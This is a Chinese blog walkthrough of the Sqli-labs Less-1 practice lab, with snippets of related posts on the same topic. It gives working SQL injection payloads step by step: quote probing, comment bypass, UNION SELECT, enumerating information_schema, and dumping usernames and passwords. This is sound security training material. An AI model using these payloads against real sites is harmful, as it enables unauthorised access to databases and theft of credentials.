Sqli-labs Less-1 题解

最新推荐文章于 2022-03-11 16:12:20 发布
最新推荐文章于 2022-03-11 16:12:20 发布
阅读量429 收藏
点赞数 1
分类专栏: 网络安全 SQL注入 文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zhuoqian_1/article/details/114682693
版权

最近学习了SQL注入,找了Sqli-labs来练习一下。

Less-1

原页面:

1、题目中参数为id,尝试?id=1

2、尝试单引号注入?id=1'

发现单引号没有被过滤

这个提示为 1' ' LIMIT 0,1 '

注意这个地方是这样看的(按上述颜色,黄色的引号不是数据库查询里的,第一次没看懂QAQ)

3、尝试?id=1' #

这里有个坑,输入#不是把之后注释掉,要用%23 ,目前不知道原因,应该是版本问题。

?id=1' %23

4、使用union select 1,2,3 查询列数,发现是3列,其他会有提示说列数不对

5、这里将加上and 1=2,因为使用id=1'始终为真,导致密码和账号始终回显的是Dumb,查询的内容无法显示。

现在可以显示了。

6、查询数据库名 select 1,2,group_concat(schema_name) from information_schema.schemata

7、明显是security,这里查询该数据库中的数据库表名 select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

8、查看users表中的列名 select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'

9、把所有用户名密码统计出来 select 1,group_concat(username,':',password) from users 

Hack成功!

Hacked By Zhuoqian !

Who am I ?

I am Zhuoqian .

Zhuoqian_1
关注
专栏目录
sqli-labs学习教程less-1
Jaychouzzk
08-18 623
虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方,欢迎评论提问,注意一定自己要先实践。   我的学习的方法是什么呢? 先自己尝试一下注入,实在不行就看源码,再不行就看别人的指导,反正就是要弄懂   开篇先说说一些基础知识,当然一些基本的sq...
sqli-lab 题解
weixin_33827731的博客
04-26 261
sqli-lab:1--后边必须跟空格,而且空格必须是url编码的,不然在url中是不识别的。eg:--%20 ,#的空格是%23order by 去发现列数union select 去显示要的数据,当order by不起作用的时候,当order by 不在末尾的时候。也可以用来判断列。如:mysql> SELECT * FROM users WHERE id =3 ...
sqli解题思路
qq_40661620的博客
07-30 453
** sqli解题思路 ** 小白开始重新学习sqli 1关: 单引号,字符串,错误注入,联合注入 http://172.16.13.33/sqli/Less-1/?id=1’ and 1=1–+ 接着进行联合注入 2关: 整型,报错,联合注入 http://172.16.13.33/sqli/Less-2/?id=1 and 1=2 整型可以不用加注释 后进行联合注入 3关 : 错...
sqli-lab题解及经验总结二
一枚努力的蛋蛋
07-10 729
sqli-lab题解及经验总结二
Sqli-labs 1-65关的解题记录(做题思路与简要)
CaesarQu的博客
08-13 3800
Sqli-labs的详细解题记录 Less-1: 进入关卡内先判断是否存在注入情况,先输入?id =1 and 1=1,发现没有变化,换成and 1=2,依旧没有变化,考虑是为字符型而非整形。用 ’ 进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入。 发现为字符型的后先在后面加一个注释符 --+ 可以发现正常返回数据。 此处可以用 order by 对前面的数据进行排列,先进行试数,发现只有三组数据,'order by 4–+就会超出 然后就可以进行union联合注入 然后就可以获取所有
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
Sqli-Labs靶场(6--10)题详解
weixin_46099095的博客
03-11 2314
六、Less-6:GET - Double Injection - Double Quotes - string(GET - 双重注入 - 双引号 - 字符串) 此题解法与Less-5类似 只需判断注入点时使用?id=1"-- + 附上Less1-Less5题解 https://blog.csdn.net/weixin_46099095/article/details/123399846?spm=1001.2014.3001.5502 七、Less-7:GET - Dump into outfil
sqli-labs less-1
zbbjya的博客
02-08 459
请输入id作为带数值的参数 ==================================================----------======= 输入 ?id=1 我们会看到这个sql语句是我们添加进去的,原本是应该没有的 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据 再输入加一个单引号我们会发现报错了 ​ ?id=1' 一个一个的试 127.0.0...
sqli-labs之less1
weixin_44791273的博客
09-10 224
题目提示输入id作为参数数值 浏览器通常使用 ? 来表示GET方法传递参数,而使用POST传递参数是不会显示到URL中的。 首先尝试传递 id=0 传递id=1试一下 发现查询成功,证明1是存在的 下面接着以0为例子 加上 ‘ 来试试 %27 是指 ’ 的编码 发现页面回显且报错 报错信息的最后面的内容:use near ’‘0’‘ LIMIT 0,1’ at line 1 ,仔细观察,我们都知道php的语句如果有 ’ 的话,肯定要有另一个 ‘ 来进行闭合,不然就是不完整的语句。那我们不妨.
sqli-labs靶场 SQL注入学习 Less-1
p4nic的博客
09-10 310
GET - Error based - Single quotes - String GET类型-基于报错的注入 类似于http://localhost/sqli-labs/Less-1/?id=1的URL,通过查询字符串(/?id=1)中传递参数 开发人员直接将GET获取到的参数直接与SQL语句拼接,使得待执行的SQL语句可控,即可以构造非法的SQL语句,造成了SQL注入漏洞 在注入之前,先了解一下MySQL数据库中的元数据 information_schema下的表格 informatio.
Sqli-Labs Less1-16关详细讲解
大大大蜜蜂的博客
10-21 3903
information_schema数据库介绍: information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。information_schema是信息数据库,其中保存着关于mysql服务器所维护的所有其他数据库的信息。 下列为information_schema数据库中schemata表、tables表、columns表的介绍。 schemata表:提供了当前mysql实例中所有数据库的信息。 sche
Sqli-Labs之less-2
ISNS的博客
02-05 971
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
sql注入练习——Less-1
nzw1134864657的博客
10-14 564
1.判断是否存在注入 输入“?id=1”,发现有变化,说明存在注入 2.判断闭合字符,注释后面的内容 输入“ ?id=1’ ” http://127.0.0.1/sqli-labs-master/Less-1/?id=1’%23 3.判断列数 使用order by(排序),来判断有几列数据,随便写,先写order by 10,回显错误,则说明列数是小于5,尝试5,回显结果仍是错误的,再尝试...
sqli-labs>>Less-1
YOUNGBC的博客
03-17 256
准备最近刷一下sqli-labs,也是一个边学习边实践的过程,希望自己可以坚持下去吧。 在这里先推荐一下用HackBar这个浏览器插件(FireFox/Chrome),怎么破解百度一下就成,我也不多说了,下面步入正题: 我们先输入http://localhost/sqli-labs-master/Less-1/?id=1测试一下,没有问题 http://localhost/sqli-l...
sqli-labs less-2
niuniu1996的博客
10-19 85
id=1 id=2 id=2',所以存在数字型报错注入,因为报错回显没有显示参数内容 id=2 and 1=1 id=2 and 1=2,两次回显不一样,存在布尔类型状态 输出回显位为2和3 id=2 and 1=2 union select 1,version(),database(),查出版本号和数据库名称 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值